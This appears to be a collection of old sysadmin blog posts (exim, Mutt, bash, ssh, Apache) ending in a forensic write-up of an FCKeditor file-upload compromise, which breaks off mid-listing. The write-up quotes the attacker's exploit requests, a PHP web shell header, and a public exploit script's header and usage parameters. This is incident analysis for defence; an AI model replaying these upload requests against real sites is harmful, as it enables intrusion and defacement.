exim -M emailIDforce delivery of one message
exim -qfForce another queue run
exim -qffForce another queue run and attempt to flush frozen messages
exim -Mvl messageIDView Log for message
exim -Mvb messageIDView Body for message
exim -Mvh messageIDView Header for message
exim -Mrm messageIDReMove message (no errors sent)
exim -Mg messageIDGive up and fail message, message bounces to sender
From:

http://www.harkness.co.uk/exim/exim_commands.html

Syndicating full text on Blogger

It's very simple to syndicate the full text content of your Blogger site.

1. Login to your admin dashboard
2. Choose Settings->Site Feed
3. Click the drop-down menu on Description, and choose "Full"
4. Save Settings

A description setting of "Short" uses a element:

<summary type="application/xhtml+xml" xml:base="http://erikin.blogspot.com" xml:space="preserve">
<div xmlns="http://www.w3.org/1999/xhtml">I am putting some text here to see what the xml looks like... I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to</div>
</summary>

(According to notes on the Site Feed page: “Select Short if you only wish to syndicate the first paragraph, or approximately 255 characters, whichever is shorter.”

A description setting of “Full” uses removes the element, and uses a element:

<content type="application/xhtml+xml" xml:base="http://erikin.blogspot.com" xml:space="preserve">
<div xmlns="http://www.w3.org/1999/xhtml">I am putting some text here to see what the xml looks like... I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...


I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...</div>
</content>

The following diff shows the changes:

--- blogger_atom_short.xml 2006-03-24 07:19:40.000000000 -0600
+++ blogger_atom_full.xml 2006-03-24 07:20:53.000000000 -0600
@@ -8,7 +8,7 @@
<tagline mode="escaped" type="text/html"></tagline>
<link xhref="http://erikin.blogspot.com" rel="alternate" title="erikin blogger site" type="text/html"/>
<id>tag:blogger.com,1999:blog-24658952</id>
-<modified>2006-03-24T13:18:38Z</modified>
+<modified>2006-03-24T13:21:49Z</modified>
<generator url="http://www.blogger.com/" version="5.15">Blogger</generator>
<info mode="xml" type="text/html">

@@ -27,9 +27,10 @@
<link xhref="http://erikin.blogspot.com/2006/03/put-some-test-here.html" rel="alternate" title="Put some test here..." type="text/html"/>
<id>tag:blogger.com,1999:blog-24658952.post-114320285516000985</id>
<title mode="escaped" type="text/html">Put some test here...</title>
-<summary type="application/xhtml+xml" xml:base="http://erikin.blogspot.com" xml:space="preserve">
-
<div xmlns="http://www.w3.org/1999/xhtml">I am putting some text here to see what the xml looks like... I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to</div>
-</summary>
+<content type="application/xhtml+xml" xml:base="http://erikin.blogspot.com" xml:space="preserve">
+
<div xmlns="http://www.w3.org/1999/xhtml">I am putting some text here to see what the xml looks like... I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...

+
I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...I am putting some text here to see what the xml looks like...</div>
+</content>
<draft xmlns="http://purl.org/atom-blog/ns#">false</draft>
</entry>
</feed>

Converting Thunderbird address books to Mutt Aliases

In an attempt to get a handle on my email, I am trying out Mutt again. To help ease the transition, I wrote the following script which takes a CSV file that I have exported from Mozilla Thunderbird, and adds it to my mutt aliases file.


#!/bin/sh

usage() {
echo "Usage: $0 $1 [/path/to/csv/addressbook/file] [/path/to/mutt/aliases/file] "
exit 99
}
[ "$1" == "--help" ] && usage
[ $# -ne 2 ] && usage

CSVFILE=$1
MUTTALIASES=$2

# cat CSVFILE, then manipulate it line by line
cat $CSVFILE |
while read line
do
# The important fields for our mutt alias file are:
#
# 1 => firstname
# 2 => lastname
# 3 => Display Name
# 5 => email address
#
# This line takes the Display Name, (which is in the format: Firstname Lastname),
# and transforms it into "firstname_lastname"
namealias=$(echo ${line} | cut -d, -f3 | tr " " _ | tr "[:upper:]" "[:lower:]" | tr "\&" "and" | grep -v "'" | grep -v "\." | grep -v "-" | grep -v "^$")

# Now, grab the firstname, lastname, and email address
firstname=$(echo ${line} | cut -d, -f1)
lastname=$(echo ${line} | cut -d, -f2)
emailaddr=$(echo ${line} | cut -d, -f5)

# I didn't want any entries in the aliases file that were missing
# namealias, firstname, lastname, or emailaddr, so I just omit
# those entries. (Now that I look back, I might not need the
# grep -v "^$, when initializing namealias
if [ "$namealias" == "" ]; then
continue
elif [ "$firstname" == "" ]; then
continue
elif [ "$lastname" == "" ]; then
continue
elif [ "$emailaddr" == "" ]; then
continue
else
echo "alias $namealias $firstname $lastname $emailaddr" >> $MUTTALIASES
fi
done

FPSE: “Error 500 The Specified Module Could Not Be Found” When You Remove and Reconfigure FrontPage Server Extensions


http://support.microsoft.com/default.aspx?scid=kb%3Ben-us%3B282109


This problem bit me tonight… Who would have ever thought that you needed to close the MMC after removing FPSE to clear the cache…?!

Yikes!!

emacs, vm, and imap-ssl

Here is an excerpt from my .vm file, which works thanks to the fact that I removed stunnel4, and installed stunnel 3.26-7:

(setq vm-primary-inbox "imap-ssl:my.server.com:993:inbox:login:me:*")

;Note you need stunnel installed for this to work, but that should be
;available on most systems that have VM
(setq vm-stunnel-program "/usr/sbin/stunnel")
(setq vm-imap-expunge-after-retrieving 'nil)

(setq vm-imap-server-list '(
"imap-ssl:my.server.com:993:inbox:login:me:*"
)
)

changing directory listing colors

Just figured out how to customize the coloring of directory listings in BASH.

1. dircolors = command used to print out color configuration to STDOUT. (use “–print-database” to print out ALL configuration settings).
2. LS_COLORS = environment variable used to set dircolor configuration for BASH

HOW-TO:

1. create new file containing contents of current LS_COLORS envvar

dircolors > ~/.bash_dircolors

2. modify the contents of ~/.bash_dircolors according to the following key:

Attribute codes are 00=none 01=bold 04=underscore 05=blink 07=reverse 08=concealed, text color codes are 30=black 31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan 37=white, and background color codes are 40=black 41=red 42=green 43=yellow 44=blue 45=magenta 46=cyan 47=white. Here are the some useful types:

no: normal, global default, although everything should be something.
fi: normal file
di: directory
ln: symbolic link
pi: FIFO, pipe
so: socket
bd: block device driver
cd: character device driver
or: orphan, symlink to nonexistent file
ex: files with execute permission

(http://billharlan.com/pub/papers/Gnu_Linux_Miscellaneous.html)

3. source the file to test:

source ~/.bash_dircolors

4. When happy with changes, add the following to .bash_profile, to source .bash_dircolors when you login:

# include .bash_dircolors if it exists
if [ -f ~/.bash_dircolors ]; then
. ~/.bash_dircolors
fi

NOTES:

1. Here is an example of the LS_COLORS

LS_COLORS=’no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.avi=01;35:*.fli=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.flac=01;35:*.mp3=01;35:*.mpc=01;35:*.ogg=01;35:*.wav=01;35:’;
export LS_COLORS

2. To add a background color, change the following:

ln=01;36

To:

ln=01;36;40

ssh authentication through public/private keypairs

You can generate public/private keypairs to help aid in managing large numbers of machines. (This saves you from having to enter your password every time you login to a machine).

1. Generate a RSA key:

ssh-keygen -t rsa

2. cd into your .ssh directory and run the following command:

cat .ssh/id_rsa.pub | ssh user@remotehost 'cat - >> ~/.ssh/authorized_keys2'

If it complains about a missing .ssh directory on the remotehost, ssh to the machine (remotehost), and then ssh to another machine from remotehost. (This is a quick way to create that directory). Then rerun step 2 above.
Reference:

http://www.modwest.com/help/kb20-90.html

frontpage server extensions 2002/windows 2003

After trying to setup frontpage server extensions 2002 in a load-balanced environment (windows 2003 with a NAS back-end), I am admitting defeat. Though we currently use this setup with FPSE for Unix (version4), Windows won’t install FPSE on a remote share… :(

To get around this problem, (we are migrating our FPSE for Unix webs to Windows 2003 for obvious reasons), we are going to setup a single machine with FPSE, and then have a fail-over machine which XCOPYs the web root every X minutes. The load-balancers will then fail-over to the backup machine for us, so, though not optimal, it is functional.

Replacing mod_macro for Apache webfarm configuration

Finally, I have come up with a way to configure my apache servers across a web farm, (using a single configuration). All we need to do is to add four lines to our /etc/init.d/apache2 shell script (on Debian):

#!/bin/sh -e
#
# apache2 This init.d script is used to start apache2.
# It basically just calls apache2ctl.

ENV=”env -i LANG=C PATH=/usr/local/bin:/usr/bin:/bin”

### let’s create our temp httpd.conf file (we’ll call it apache2.conf for fun ;) )

# grab the local machine’s ip address
LOCALIP=$(/sbin/ifconfig eth0 | awk ‘/inet/ { print $2 }’ | awk -F “:” ‘{ print $2 }’)

# copy the main apache2.conf file from the NAS to a tmp location on the local machine
cat /etc/apache2/apache2.conf > /etc/apache2.conf

# cat (append) all of the vhost files from /etc/apache2/sites-enabled/* into /etc/apache2.conf
cat /etc/apache2/sites-enabled/* >> /etc/apache2.conf

# replace our placeholder (CWSIPADDRESS) with the local ip address
sed -i “s/CWSIPADDRESS/${LOCALIP}/g” /etc/apache2.conf

### Now, we run the rest of the apache startup script.

#[ `ls -1 /etc/apache2/sites-enabled/ | wc -l | sed -e ’s/ *//;’` -eq 0 ] && \
#echo “You haven’t enabled any sites yet, so I’m not starting apache2.” && \
#echo “To add and enable a host, use addhost and enhost.” && exit 0
….

NOTES:

1. It might be better to place these lines in the start sections… (I haven’t really thought about it).
2. My only issue with mod_macro was that we couldn’t take advantage of the cool tools given to us by the Debian Apache2 team. (ie a2ensite/a2dissite), and the ease of maintenance of the conf file as it pushes over 1,000 lines.

BASH) add newline to end of file

This is a cool tip for adding a newline to the end of all the files in a directory:

for i in $(ls); do echo >> $i ; done

Anatomy of a fckeditor hack

Introduction

As more crackers begin to exploit security holes in web application, I find that it is helpful to be able to do some of your own forensic analysis in the attempt to fix the exploited security holes. The following article details my process for finding information about a successful compromise on a web application hosted on one of my own servers. You will notice that many successful web application attacks have similar characteristics, so you will become faster and faster at finding the exploited application.

Process of Elimination:

When I cat out my log files, I always grep for a couple of different items:

1. Start with the information that I know:
- ie For this defacement, I knew the location of the defaced file:
- http://myweb/default.htm

Here are the entries matching default.htm in the access_log:


access_log:200.118.2.219 - - [07/May/2006:10:45:55 -0500] “GET /default.htm HTTP/1.1″ 200 529 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
access_log:213.219.122.11 - - [07/May/2006:10:46:55 -0500] “GET /default.htm HTTP/1.0″ 200 529 “-” “Wget/1.9.1″
access_log:202.122.243.167 - - [07/May/2006:10:47:41 -0500] “GET /default.htm HTTP/1.1″ 200 529 “-” “libwww-perl/5.805″
access_log:164.71.2.5 - - [07/May/2006:10:49:18 -0500] “GET /default.htm HTTP/1.0″ 200 529 “-” “Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)”
access_log:218.227.202.243 - - [07/May/2006:10:53:02 -0500] “GET /default.htm HTTP/1.0″ 200 529 “-” “mozilla4.0″
access_log:72.177.110.25 - - [10/May/2006:20:05:59 -0500] “GET /default.htm HTTP/1.1″ 200 529 “-” “Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3″
access_log:161.11.120.62 - - [10/May/2006:20:55:11 -0500] “GET /default.htm HTTP/1.1″ 200 529 “http://www.zone-h.org/en/defacements/view/id=3777766/” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
access_log:68.185.200.70 - - [10/May/2006:21:00:41 -0500] “GET /default.htm HTTP/1.1″ 200 529 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3″
access_log:68.185.200.70 - - [10/May/2006:21:04:41 -0500] “GET /default.htm HTTP/1.1″ 304 - “http://www.zone-h.org/en/defacements/view/id=3777766/” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3″
access_log:68.191.220.68 - - [10/May/2006:22:00:05 -0500] “GET /default.htm HTTP/1.1″ 200 529 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3″
access_log:149.168.132.137 - - [11/May/2006:06:28:23 -0500] “GET /default.htm HTTP/1.1″ 200 529 “http://www.zone-h.org/en/defacements/filter/filter_domain=.edu/” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3″
access_log:204.65.220.10 - - [11/May/2006:07:28:00 -0500] “GET /default.htm HTTP/1.1″ 200 529 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3″
access_log:71.11.242.247 - - [11/May/2006:08:12:13 -0500] “GET /default.htm HTTP/1.1″ 200 529 “-” “Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.2) Gecko/20060502 Ubuntu/dapper Firefox/1.5.0.2″
access_log:68.191.219.175 - - [11/May/2006:08:13:05 -0500] “GET /default.htm HTTP/1.1″ 200 529 “-” “Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3″
access_log:68.191.219.175 - - [11/May/2006:08:17:58 -0500] “GET /default.htm HTTP/1.1″ 404 209 “-” “Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3″
error_log:[Thu May 11 08:17:58 2006] [error] [client 68.191.219.175] File does not exist: /webroot/myweb/default.htm

If I check the timestamp of the default.htm file:

-rw-r–r– 1 root root 529 May 7 10:45 default.htm

with my log entries, I find:

access_log:200.118.2.219 - - [07/May/2006:10:45:55 -0500] “GET /default.htm HTTP/1.1″ 200 529 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”

I also notice that a popular defacement site has hit this file:

access_log:161.11.120.62 - - [10/May/2006:20:55:11 -0500] “GET /default.htm HTTP/1.1″ 200 529 “http://www.zone-h.org/en/defacements/view/id=3777766/” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”

This corresponds my theory of a web defacement, as most attackers that are doing defacement like to place the sites up on zone-h, or other defacement archive sites.

2. I run host on the ip address from the matching log entry to see if I can find more information about the host:

me@mylap:~$ host 200.118.2.219
Host 219.2.118.200.in-addr.arpa not found: 3(NXDOMAIN)

I find that the host is not found, but this is not unusual. The attack could have come from a compromised host, a spoofed ip address, or an anonymous proxy.

3. I grep out all entries that match the ip address 200.118.2.219:

victim:/var/log/oldapache# cat access_log | grep 200.118.2.219
200.118.2.219 - - [07/May/2006:10:43:53 -0500] “GET /feeds/In_the_News_rssp.cfm HTTP/1.1″ 200 12216 “http://www.google.com/search?hl=tr&q=index.cfm%3FcommentID%3D&btnG=Ara&lr=” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
200.118.2.219 - - [07/May/2006:10:43:58 -0500] “GET /admin/fckeditor HTTP/1.1″ 301 247 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
200.118.2.219 - - [07/May/2006:10:43:58 -0500] “GET /admin/fckeditor/ HTTP/1.1″ 403 218 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
200.118.2.219 - - [07/May/2006:10:44:11 -0500] “POST /admin/fckeditor/editor/filemanager/browser/default/connectors/cfm/connector.cfm?Command=FileUpload&Type=zeh&CurrentFolder=/&ServerPath=/Images/ HTTP/1.1″ 200 111 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
200.118.2.219 - - [07/May/2006:10:44:23 -0500] “GET /zeh/zeh3.jpg.asp HTTP/1.1″ 200 34542 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
200.118.2.219 - - [07/May/2006:10:44:31 -0500] “POST /admin/fckeditor/editor/filemanager/browser/default/connectors/cfm/connector.cfm?Command=FileUpload&Type=zeh&CurrentFolder=/&ServerPath=/Images/ HTTP/1.1″ 200 111 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
200.118.2.219 - - [07/May/2006:10:44:47 -0500] “GET /zeh/irc.jpg.php HTTP/1.1″ 200 8581 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
200.118.2.219 - - [07/May/2006:10:44:48 -0500] “GET /zeh/irc.jpg.php?image=smiley HTTP/1.1″ 200 92 “http://myweb/zeh/irc.jpg.php” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
200.118.2.219 - - [07/May/2006:10:44:49 -0500] “GET /zeh/irc.jpg.php?image=folder HTTP/1.1″ 200 90 “http://myweb/zeh/irc.jpg.php” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
200.118.2.219 - - [07/May/2006:10:44:49 -0500] “GET /zeh/irc.jpg.php?image=arrow HTTP/1.1″ 200 70 “http://myweb/zeh/irc.jpg.php” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
200.118.2.219 - - [07/May/2006:10:44:49 -0500] “GET /zeh/irc.jpg.php?image=file HTTP/1.1″ 200 93 “http://myweb/zeh/irc.jpg.php” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
200.118.2.219 - - [07/May/2006:10:44:52 -0500] “POST /zeh/irc.jpg.php HTTP/1.1″ 200 3668 “http://myweb/zeh/irc.jpg.php” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
200.118.2.219 - - [07/May/2006:10:44:58 -0500] “POST /zeh/irc.jpg.php HTTP/1.1″ 200 3652 “http://myweb/zeh/irc.jpg.php” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
200.118.2.219 - - [07/May/2006:10:45:14 -0500] “POST /admin/fckeditor/editor/filemanager/browser/default/connectors/cfm/connector.cfm?Command=FileUpload&Type=/&CurrentFolder=/&ServerPath=/Images/ HTTP/1.1″ 200 111 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
200.118.2.219 - - [07/May/2006:10:45:55 -0500] “GET /default.htm HTTP/1.1″ 200 529 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
200.118.2.219 - - [07/May/2006:10:46:00 -0500] “GET /skins/BlogFusion/_stylesheet.css HTTP/1.1″ 200 12835 “http://myweb/” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”

Now, we are getting some interesting information:

a. We now have our point of entry:

200.118.2.219 - - [07/May/2006:10:43:53 -0500] “GET /feeds/In_the_News_rssp.cfm HTTP/1.1″ 200 12216 “http://www.google.com/search?hl=tr&q=index.cfm%3FcommentID%3D&btnG=Ara&lr=” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”

The attacker used a google search of:
http://www.google.com/search?hl=tr&q=index.cfm%3FcommentID%3D&btnG=Ara&lr=

which returned a list of sites running BlogFusion, obviously an application that contains the vulnerability. (Our site was high on the list).

b. We have the first appearance of the vulnerable application:

200.118.2.219 - - [07/May/2006:10:43:58 -0500] “GET /admin/fckeditor HTTP/1.1″ 301 247 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”


The fckeditor has had a recent vulnerability found which allows remote attackers to upload malicious PHP files to the server:
http://www.frsirt.com/english/advisories/2006/0502

c. Next, we see the vulnerability exploited to upload a folder with files to the server:

200.118.2.219 - - [07/May/2006:10:44:11 -0500] “POST /admin/fckeditor/editor/filemanager/browser/default/connectors/cfm/connector.cfm?Command=FileUpload&Type=zeh&CurrentFolder=/&ServerPath=/Images/ HTTP/1.1″ 200 111 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”


I notice the “zeh” in the URL, so I return to my directory listing of the webroot, and find:

drwxr-xr-x 2 root root 4096 May 7 10:44 zeh

Notice that both default.htm and the zeh folder are owned by root.root… This troubles me, and don’t quite understand how/why this has happened yet…

cA. I get a directory listing of the zeh folder:

victim:/var/log/oldapache# ls zeh/
irc.jpg.php zeh3.jpg.asp

- We don’t support ASP, so I open the irc.jpg.php file, and find:

<?php
/*
* IRC v1
* Copyright (C) 2006 MyBasH-CRUEL-sYsTeM sHocK | VuRuCuTeaM | <mybash@vurucuteam.com>
*
* Bu Kod Tamamiyle <D6>zg<FC>r Yazilimdir.
* K<F6>t<FC> Amaclar ile kullanilmamak sartiyla istenildigi gibi Kullanilabilir
* Programin amaci ftp olmadan hostunuza baglanti kurup
* Dosya ekleyip kaldira bilmektir.
* Kodumuz 6 Dilde yazilmistir.
* Server Diline G<F6>re Otomatik Secim Yapar.
* Kodu hosta attiktan sonra adres cubuguna kodun uzantisini verip baglanin
* Ve Asla kimseye bu kodun uzantisini vermeyiniz.!!
*
* -------------------------------------------------------------------------
* Hackerlar Metrosu Turkiye Hack Bilisim Platformu
* -------------------------------------------------------------------------
/* ------------------------------------------------------------------------- */

PAYDIRT!!! This is definitely not the initial hack, but is part of the payload. If you visit the irc.jpg.php file, it gives you a directory listing of the current directory, with an option to copy or download any of the files that the web server can read. (see LISTING E) The application also allows you to specify a directory, so I was able to find that the application could also read the /etc/ directory, (though most of the files are protected from copy/download).

Since we have found the payload, but not the initial hack, I look back to the fckeditor POST log entry:

200.118.2.219 - - [07/May/2006:10:44:11 -0500] “POST /admin/fckeditor/editor/filemanager/browser/default/connectors/cfm/connector.cfm?Command=FileUpload&Type=zeh&CurrentFolder=/&ServerPath=/Images/ HTTP/1.1″ 200 111 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”

I do a Google search and found the following exploit:
http://milw0rm.com/exploits/1484


<?php
# ---fckeditor_22_xpl.php 15.38 04/12/2005 #
# #
# FCKEditor 2.0 <= 2.2 shell upload #
# coded by rgod #
# site: http://retrogod.altervista.org #
# #
# usage: launch from Apache, fill in requested fields, then go! #
# #
# Sun-Tzu: "Security against defeat implies defensive tactics; ability to #
# defeat the enemy means taking the offensive" #

/* -> a short explaination: if a user cam call directly

http://[target]/[path]/editor/filemanager/browser/default/connectors/php/connector.php

he can upload malicious contempt on a target server, including arbitrary
php code, and launch commands on it

this works when php connector is enabled in config.php and when, ex.,
in Apache httpd.conf "AddType application/x-httpd-php" directive we have
an extension not specified in FCKEditor Config[DeniedExtensions][File]
array.

However, FCKeditor is integrated in a lot of applications, and if you
succeed to upload the shell (see details in the output of this script)
search for a local inclusion issue inside of them and include the uploaded
file */

This exploit can be used to attack any remote instance by running fckeditor_22_xpl.php on any php4 enabled web server. (I tested from my localhost). (See LISTING D for a successful attack). It is easy to automate, and my guess is that the attacker used a Google query tool, such as gooscan, and fed the results into the fckeditor_22_xpl.php app.

This pulls up a list of Blogfusion sites. Blogfusion, to their credit, has posted a blog entry here:
http://www.blogfusion.com/blog/index.cfm?commentID=87

with a patched version of fckeditor for blogfusion consumption. It gives information about how to remove the offending content and install the fixed version of fckeditor…

NOTES:

LISTING A:

fckeditor.php hack info (REQUIRED FORMS):
host: victim (FQDN or ip address)
path: /me/myweb/admin/
cmd: ?Command=FileUpload&Type=zeh&CurrentFolder=/&ServerPath=/Images/

LISTING B:

search query string:
http://www.google.com/search?hl=tr&q=index.cfm%3FcommentID%3D&btnG=Ara&lr=

LISTING C:

####begin of directory listing notes
me@victim:/webroot/myweb$ ls -l
total 180
-rw-r–r– 1 www-data www-data 8601 Sep 14 2005 Application.cfm
lrwxrwxrwx 1 www-data www-data 23 Sep 12 2005 CFIDE -> /webroot/CFIDE/
drwxr-xr-x 2 root root 4096 Sep 15 2005 File
drwxr-xr-x 8 www-data www-data 12288 May 5 16:45 Image
-rw-r–r– 1 www-data www-data 5141 Sep 12 2005 StartHere.html
-rw-r–r– 1 www-data www-data 2535 Sep 12 2005 _ping-photo.cfm
-rw-r–r– 1 www-data www-data 2425 Sep 12 2005 _ping.cfm
drwxr-xr-x 2 www-data www-data 4096 Feb 13 11:42 _private
drwxr-xr-x 13 www-data www-data 4096 Nov 21 10:46 admin
drwxr-xr-x 4 www-data www-data 4096 Sep 12 2005 backup
-rw-r–r– 1 www-data www-data 698 Sep 12 2005 comments.cfm
drwxr-xr-x 2 www-data www-data 4096 Sep 19 2005 database
-rw-r–r– 1 root root 529 May 7 10:45 default.htm
-rw-r–r– 1 www-data www-data 1406 Sep 12 2005 favicon.ico
drwxr-xr-x 2 www-data www-data 4096 Dec 7 11:59 feeds
drwxr-xr-x 3 www-data www-data 4096 Sep 12 2005 files
drwxr-xr-x 2 www-data www-data 4096 Sep 12 2005 help
-rw-r–r– 1 www-data www-data 697 Sep 12 2005 index.cfm
drwxr-xr-x 2 www-data www-data 4096 Sep 12 2005 ini
drwxr-xr-x 2 www-data www-data 4096 Sep 12 2005 install
-rw-r–r– 1 www-data www-data 2722 Sep 14 2005 ldap.cfm
-rw-r–r– 1 www-data www-data 876 Sep 13 2005 login.cfm
-rw-r–r– 1 www-data www-data 9507 Apr 26 10:06 mangle.rss
-rw-r–r– 1 www-data www-data 716 Sep 12 2005 password.cfm
drwxr-xr-x 2 www-data www-data 4096 Mar 29 17:09 pdfcontent
-rw-r–r– 1 www-data www-data 705 Sep 12 2005 photos.cfm
-rw-r–r– 1 www-data www-data 5365 Sep 12 2005 randomWord.cfm
-rw-r–r– 1 www-data www-data 828 Sep 12 2005 readmekenn.cfm
-rw-r–r– 1 www-data www-data 1176 Sep 12 2005 readmekenn.htm
-rw-r–r– 1 www-data www-data 763 Sep 12 2005 sendtofriend.cfm
drwxr-xr-x 7 www-data www-data 4096 Sep 12 2005 skins
-rw-r–r– 1 www-data www-data 81 Apr 21 13:33 survey.cfm
drwxr-xr-x 3 www-data www-data 4096 Jan 19 14:20 tags
-rw-r–r– 1 www-data www-data 365 Jan 19 11:18 tagtest.cfm
drwxr-xr-x 2 www-data www-data 4096 Apr 26 09:18 udf
-rw-r–r– 1 www-data www-data 104 Sep 12 2005 versionInfo.txt
-rw-r–r– 1 www-data www-data 1362 Apr 26 10:01 writexml_tester.cfm
drwxr-xr-x 2 root root 4096 May 7 10:44 zeh
me@victim:/webroot/myweb$
me@victim:/webroot/myweb$ cd zeh/
me@victim:/webroot/myweb/zeh$ ls
irc.jpg.php zeh3.jpg.asp
me@victim:/webroot/myweb/zeh$ cd ..
me@victim:/webroot/myweb$ ls
Application.cfm StartHere.html admin favicon.ico index.cfm login.cfm photos.cfm sendtofriend.cfm tagtest.cfm zeh
CFIDE _ping-photo.cfm backup feeds ini mangle.rss randomWord.cfm skins udf
File _ping.cfm comments.cfm files install password.cfm readmekenn.cfm survey.cfm versionInfo.txt
Image _private database help ldap.cfm pdfcontent readmekenn.htm tags writexml_tester.cfm
me@victim:/webroot/myweb$ cp -R zeh/ /var/log/oldapache/
cp: cannot create directory `/var/log/oldapache/zeh’: Permission denied
me@victim:/webroot/myweb$ sudo cp -R zeh/ /var/log/oldapache/
me@victim:/webroot/myweb$
####end of directory listing notes

LISTING D:

#####begin fckeditor.php SUCCESS
<html><head><title> ******* FCKEditor 2.0 <= 2.2 shell upload**************
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
